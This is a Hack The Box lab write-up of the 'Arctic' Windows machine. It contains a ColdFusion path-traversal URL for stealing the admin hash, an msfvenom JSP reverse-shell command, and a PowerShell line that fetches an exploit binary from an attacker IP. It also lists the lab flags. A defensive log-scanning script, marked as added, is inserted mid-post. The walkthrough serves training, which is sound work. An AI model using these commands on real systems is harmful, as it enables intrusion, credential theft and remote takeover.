Hacker lair Welcome to my blog where I write about Threat Hunting, Pentesting and Cybersecurity in general.

HTB Arctic (Windows)

Tools and techniques used: LFI, hashkiller, JSP shell

HTB Arctic

Recon

Nmap scan report for 10.10.10.11
Host is up (0.048s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

  • We noticed that port 8500 is open. This port is used by Adobe ColdFusion.
  • We investigate further and find a web app running.

  • Finally we were able to locate the admin page. It gives us very important information, such as the Adobe ColdFusion version running.
  • Some Google-fu reveals that this version of ColdFusion is vulnerable to LFI.
  • PoC:
     http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

  • So we exploit the admin page to obtain the password hash for the admin user.

  • We crack the SHA1 hash using the cracking website https://hashkiller.co.uk/Cracker and obtain the password: happyday.

  • We log in with the admin password.
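As a defender's counterpart to the locale traversal PoC above, the following added Python example (not part of the original writeup) scans web server access logs for requests to the CFIDE administrator path whose locale parameter carries traversal sequences, a null byte or a reference to password.properties. The log lines are constructed samples, and the Combined Log Format layout is an assumption.

```python
"""Flag ColdFusion locale-parameter traversal attempts in web access logs (added example)."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log lines in Combined Log Format (assumed layout), not real captures.
SAMPLE_LOG = """\
10.10.14.14 - - [11/Oct/2019:12:00:01 +0000] "GET /CFIDE/administrator/enter.cfm HTTP/1.1" 200 5120
10.10.14.14 - - [11/Oct/2019:12:00:05 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CColdFusion8%5Clib%5Cpassword.properties%00en HTTP/1.1" 200 4871
10.10.14.15 - - [11/Oct/2019:12:01:10 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 5120
10.10.14.16 - - [11/Oct/2019:12:02:00 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../ColdFusion8/lib/neo-security.xml%00en HTTP/1.1" 200 3300
"""

# source IP, timestamp, request target and status code of one access-log line
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')  # "..\" or "../" after decoding


def analyse_request(target):
    """Return the indicators found in one request target (empty list when clean)."""
    parts = urlsplit(target)
    if not parts.path.lower().startswith('/cfide/administrator/'):
        return []
    indicators = []
    for value in parse_qs(parts.query, keep_blank_values=True).get('locale', []):
        # parse_qs already decodes once; a second unquote catches double-encoded input
        decoded = unquote(value)
        if TRAVERSAL_RE.search(decoded):
            indicators.append('path-traversal')
        if '\x00' in decoded:
            indicators.append('null-byte')
        if 'password.properties' in decoded.lower():
            indicators.append('password-file')
    return indicators


def find_lfi_attempts(log_text):
    """Return one finding per suspicious line, with source IP, timestamp and indicators."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        indicators = analyse_request(m['target'])
        if indicators:
            findings.append({'ip': m['ip'], 'ts': m['ts'],
                             'status': int(m['status']), 'indicators': indicators})
    return findings


if __name__ == '__main__':
    for finding in find_lfi_attempts(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request is the case worth escalating, since it suggests the traversal actually returned a file.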

Exploitation

Once in the admin panel we choose the Scheduled Tasks option under Debugging & Logging to schedule a new task.

From the scheduled task settings we can upload our .jsp shell, generated with msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

We set up Apache to serve our payload.

Then we run the task so our payload gets executed.

Finally, we set up an nc listener and catch our shell.

Privilege Escalation

We run Windows Exploit Suggester and, after a lot of trial and error, find a suitable exploit:

  • MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799)

python windows-exploit-suggester.py --database 2019-10-11-mssb.xls --systeminfo systeminfo.txt

After some googling we find a compiled version of the exploit (Chimichurri.exe). We download the file to the target and run it:

powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.14/Chimichurri.exe', 'Chimichurri.exe')"

Flags

USER "02650d3a69a70780c302e146a6cb96f3"
ROOT "ce65ceee66b2b5ebaff07e50508ffb90"